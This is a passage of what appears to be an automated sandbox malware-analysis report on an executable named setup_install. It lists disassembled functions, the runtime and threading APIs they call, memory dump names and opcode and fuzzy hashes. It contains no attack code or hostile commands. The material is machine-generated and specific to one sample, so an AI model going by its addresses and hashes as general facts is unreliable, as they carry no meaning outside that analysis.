                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT(0040F76B), ref: 004986FF
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT(0040F76B), ref: 00498704
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT(0040F76B), ref: 00498709
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT(0040F76B), ref: 0049870E
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT(0040F76B), ref: 00498713
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498718
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498720
                                                                                                                              • Part of subcall function 00498680: abort.MSVCRT(?,?,20247C8B,?,0041C8E0,474E5543,0040FF5E), ref: 00498725
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: abort$Virtual$ErrorLastProtectQueryfwritevfprintf
                                                                                                                            • String ID: VirtualProtect failed with code 0x%x$@
                                                                                                                            • API String ID: 2966409508-2953866262
                                                                                                                            • Opcode ID: 2b903baf6883c4fce6a77b665fc63f231e98c1d430b57e3b69ee372d2b66d774
                                                                                                                            • Instruction ID: 18ec317647a068920c76c6a9c1bc5514894805f85fbc21d5b900ff7ed347d052
                                                                                                                            • Opcode Fuzzy Hash: 2b903baf6883c4fce6a77b665fc63f231e98c1d430b57e3b69ee372d2b66d774
                                                                                                                            • Instruction Fuzzy Hash: C4215EB2804741CFC700EF68D9C461ABBE0BF84358F058A6DD9889B295E378D4048B59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00449DB0 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 315COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.MSVCRT ref: 00449EE1
                                                                                                                            • memchr.MSVCRT ref: 00449F05
                                                                                                                              • Part of subcall function 00481AE0: pthread_once.LIBWINPTHREAD-1(?,?,?,?,00426D64), ref: 00481AF2
                                                                                                                              • Part of subcall function 004905F0: setlocale.MSVCRT ref: 0049060A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memchrmemcpypthread_oncesetlocale
                                                                                                                            • String ID: -$.
                                                                                                                            • API String ID: 3643807795-3807043784
                                                                                                                            • Opcode ID: f9714f406f5498ad54fb2babedcf7e6be38fbafbc78f689d2d6eb603342eeb6e
                                                                                                                            • Instruction ID: 86305eb9e2a36562dc8029c398ed2f98b38fe527239731c55b932148e1023322
                                                                                                                            • Opcode Fuzzy Hash: f9714f406f5498ad54fb2babedcf7e6be38fbafbc78f689d2d6eb603342eeb6e
                                                                                                                            • Instruction Fuzzy Hash: 11D123B0D047099FDB04EFA9C48059EBBF0BF88314F15892AE894AB355D738D946CF86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0044A220 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 313COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • memcpy.MSVCRT ref: 0044A34B
                                                                                                                            • memchr.MSVCRT ref: 0044A36F
                                                                                                                              • Part of subcall function 00481AE0: pthread_once.LIBWINPTHREAD-1(?,?,?,?,00426D64), ref: 00481AF2
                                                                                                                              • Part of subcall function 004905F0: setlocale.MSVCRT ref: 0049060A
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: memchrmemcpypthread_oncesetlocale
                                                                                                                            • String ID: .$6
                                                                                                                            • API String ID: 3643807795-4089497287
                                                                                                                            • Opcode ID: 2c3b0e2d34b67ae1c5d2d528dc1f2a1350069ce3a18d2d3dd3d0294bd3043a7e
                                                                                                                            • Instruction ID: 97fecf63d6619103c4a457df1a945bccf077c68f262897d9641c6e2e1127a924
                                                                                                                            • Opcode Fuzzy Hash: 2c3b0e2d34b67ae1c5d2d528dc1f2a1350069ce3a18d2d3dd3d0294bd3043a7e
                                                                                                                            • Instruction Fuzzy Hash: D0D146B0D083599FDB00DFA9C48059EBBF0BF88304F048A2EE894A7352D738D955CB96
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00405C35 Relevance: 7.8, APIs: 3, Strings: 2, Instructions: 250stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: strcmp
                                                                                                                            • String ID: )$q0J
                                                                                                                            • API String ID: 1004003707-970923547
                                                                                                                            • Opcode ID: 105beb41e881accefd200d24b33fff096e6fc861083f8b2b10e437696b944701
                                                                                                                            • Instruction ID: 7be2c28c8d8e3b64f3c6871371633791d68a80528e5e120f6c8f018ce7dc2c20
                                                                                                                            • Opcode Fuzzy Hash: 105beb41e881accefd200d24b33fff096e6fc861083f8b2b10e437696b944701
                                                                                                                            • Instruction Fuzzy Hash: 11D1D770508241CFDB11DF28C4C87AA7BE1AF55318F0985BAEC885F357C3B99885DBA5
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00496010 Relevance: 7.7, APIs: 5, Instructions: 182COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • pthread_once.LIBWINPTHREAD-1 ref: 00496024
                                                                                                                            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00496031
                                                                                                                            • pthread_once.LIBWINPTHREAD-1 ref: 00496051
                                                                                                                            • pthread_cond_broadcast.LIBWINPTHREAD-1 ref: 0049605E
                                                                                                                            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 0049606F
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: pthread_once$pthread_cond_broadcastpthread_mutex_lockpthread_mutex_unlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2735080877-0
                                                                                                                            • Opcode ID: ef391064c9f25a7c6f1cf442723d177a6e7c66633a1fe1654034f218803a3964
                                                                                                                            • Instruction ID: 8806e8ea4bfb3caf2070d1bc919afe7e96769c3f258359c86c510b207deee36b
                                                                                                                            • Opcode Fuzzy Hash: ef391064c9f25a7c6f1cf442723d177a6e7c66633a1fe1654034f218803a3964
                                                                                                                            • Instruction Fuzzy Hash: AB515A714196008ACF217F72888626EBEE1AF5234CF159C3FE4806B742DB7D9885979F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004961F0 Relevance: 7.7, APIs: 5, Instructions: 174COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • pthread_once.LIBWINPTHREAD-1 ref: 00496208
                                                                                                                            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 00496215
                                                                                                                            • pthread_once.LIBWINPTHREAD-1 ref: 00496234
                                                                                                                            • pthread_cond_broadcast.LIBWINPTHREAD-1 ref: 00496241
                                                                                                                            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00496252
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: pthread_once$pthread_cond_broadcastpthread_mutex_lockpthread_mutex_unlock
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2735080877-0
                                                                                                                            • Opcode ID: 2c1640240e5648525ccb77aa906733268a2b9cdc53b79012667d1ed0447073d3
                                                                                                                            • Instruction ID: 74b65b80085cc4eb20969511d2e0458d2737acf61312a58512f497928ae5003f
                                                                                                                            • Opcode Fuzzy Hash: 2c1640240e5648525ccb77aa906733268a2b9cdc53b79012667d1ed0447073d3
                                                                                                                            • Instruction Fuzzy Hash: 07515B714097008ACF217F72888626EBEE1AF52348F15987FE4846B742DB7C9885D79F
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00490270 Relevance: 7.6, APIs: 5, Instructions: 78stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: setlocale$memcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4096897932-0
                                                                                                                            • Opcode ID: 18b5aeef747e30c30adc804e8a5c039a69b76513b644901866e63e707c03ab44
                                                                                                                            • Instruction ID: 1d5c3efcf53ea597ad88ca35a9af6e5dc79f0bac6bbcf0e748121e39b02aac29
                                                                                                                            • Opcode Fuzzy Hash: 18b5aeef747e30c30adc804e8a5c039a69b76513b644901866e63e707c03ab44
                                                                                                                            • Instruction Fuzzy Hash: AD317FB19087049FCB01BF16D88475EBFF4EB85784F1148AEF5C447361E77988918B9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00490390 Relevance: 7.6, APIs: 5, Instructions: 75stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: setlocale$memcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4096897932-0
                                                                                                                            • Opcode ID: 2039ead0c0fc458c5ebf0b62c3d5b66492809dce9e423f01c077308de38e2ddf
                                                                                                                            • Instruction ID: b7e94dc6f3a40c82fefa1643d4c1f8405ebee6f375eed70682c487f5ff9de609
                                                                                                                            • Opcode Fuzzy Hash: 2039ead0c0fc458c5ebf0b62c3d5b66492809dce9e423f01c077308de38e2ddf
                                                                                                                            • Instruction Fuzzy Hash: CC215EB190C2059ECB02BF25D98075EBFF4EB85784F11486FE5C487261E37988918B9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004904A0 Relevance: 7.6, APIs: 5, Instructions: 71stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: setlocale$memcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4096897932-0
                                                                                                                            • Opcode ID: 360cbca73b8f829ac6f167fb761e777b8a1c51edd8ca7cbee769c325db8cc5c0
                                                                                                                            • Instruction ID: 653653ccef0fa9cf01ad7d845ca61abc6431d8c18e14987cd5ca5ad5091c235e
                                                                                                                            • Opcode Fuzzy Hash: 360cbca73b8f829ac6f167fb761e777b8a1c51edd8ca7cbee769c325db8cc5c0
                                                                                                                            • Instruction Fuzzy Hash: 602108B1908205AFC702BF25D48075ABFF4EB85794F16486EE4C987261E37988858F9A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004905F0 Relevance: 7.6, APIs: 5, Instructions: 66stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: setlocale$memcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 4096897932-0
                                                                                                                            • Opcode ID: 147630f30542b2507ea39d1ea020969dec1cbd217d52059b6d96b72e2b842c4f
                                                                                                                            • Instruction ID: a998beac34b5219ae7fefe155fd5933df80aa292c7c10737ad65b800937ee100
                                                                                                                            • Opcode Fuzzy Hash: 147630f30542b2507ea39d1ea020969dec1cbd217d52059b6d96b72e2b842c4f
                                                                                                                            • Instruction Fuzzy Hash: B421E9B0A093049FD740EF29D58165EFBE4EF88758F41892EF5C8D7312E77898818B86
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 004128D5 Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: __doserrno_errno
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 921712934-0
                                                                                                                            • Opcode ID: 0836ee068e530ef416cb807314ffe668bb8bb891ab51372edeff834242208d56
                                                                                                                            • Instruction ID: 6cf2916836edec0ba8c471ffebbc2e327bdd7a7feba52c73e7efc83aa2e977d8
                                                                                                                            • Opcode Fuzzy Hash: 0836ee068e530ef416cb807314ffe668bb8bb891ab51372edeff834242208d56
                                                                                                                            • Instruction Fuzzy Hash: 54019EF2A181114EE6106B18BD812DB7750EB02324F0A0277E4946B260E3B9ACE687D6
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00480480 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 436COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            • pthread_mutex_lock.LIBWINPTHREAD-1 ref: 004804AF
                                                                                                                            • pthread_mutex_unlock.LIBWINPTHREAD-1 ref: 00480519
                                                                                                                            • pthread_mutex_init.LIBWINPTHREAD-1 ref: 00480573
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: pthread_mutex_initpthread_mutex_lockpthread_mutex_unlock
                                                                                                                            • String ID: PA
                                                                                                                            • API String ID: 3657917519-4003426662
                                                                                                                            • Opcode ID: 0dcd00539fb479f73765b64e0c7804602647ec771d7d9ff76c2f6849d2c1bb87
                                                                                                                            • Instruction ID: df0f21d4738eb6617838b4097e9e844cf42a4c445ab5cdd53acf61181512411a
                                                                                                                            • Opcode Fuzzy Hash: 0dcd00539fb479f73765b64e0c7804602647ec771d7d9ff76c2f6849d2c1bb87
                                                                                                                            • Instruction Fuzzy Hash: B4F1E8B1508A008BCB157F32849257EBBA1AF41348F129C3FE4C56B742DF7C954A9B9E
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0041BA79 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 17stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: atoisetlocalestrchr
                                                                                                                            • String ID: .
                                                                                                                            • API String ID: 1223908000-248832578
                                                                                                                            • Opcode ID: d35692f89521116a1a2ca321ccc98d62fb3fb544d120531b771b0ca7f655c9dc
                                                                                                                            • Instruction ID: 2f06e815d61fb41ebdd35e5e63aa4b9a43deca2a9d4528af53b0684da063643d
                                                                                                                            • Opcode Fuzzy Hash: d35692f89521116a1a2ca321ccc98d62fb3fb544d120531b771b0ca7f655c9dc
                                                                                                                            • Instruction Fuzzy Hash: CDE0ECB59087008BD7107F39C51536BB6E2EF80304F85C81DD48847609EB7D94849787
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0040C2A0 Relevance: 6.3, APIs: 5, Instructions: 98stringCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287122632.00000000004A1000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287156446.00000000004E6000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287161062.00000000004E9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287176297.000000000050C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_5_2_400000_setup_install.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: freememcpystrlen
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2208669145-0
                                                                                                                            • Opcode ID: 2e97e3c904bbc64c8b5b6016756550b949e61f8c6b5600f13d4c8c8e996c3fd4
                                                                                                                            • Instruction ID: 26dd1fc0fc3920fdd1948928f0fdc1c698e605dcc289578514f4a81a04f5e052
                                                                                                                            • Opcode Fuzzy Hash: 2e97e3c904bbc64c8b5b6016756550b949e61f8c6b5600f13d4c8c8e996c3fd4
                                                                                                                            • Instruction Fuzzy Hash: 37317C71624701CBC3109F2694C032FBBE0AFC4754F158A3EED9567390D339D8468B8A
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 0042A5F0 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 328COMMON
                                                                                                                            Download Yara Rule
                                                                                                                            APIs
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000005.00000002.287032717.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000005.00000002.287009661.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000005.00000002.287101526.000000000049F000.00000004.00000001.01000000.00000004.sdmpDownload File
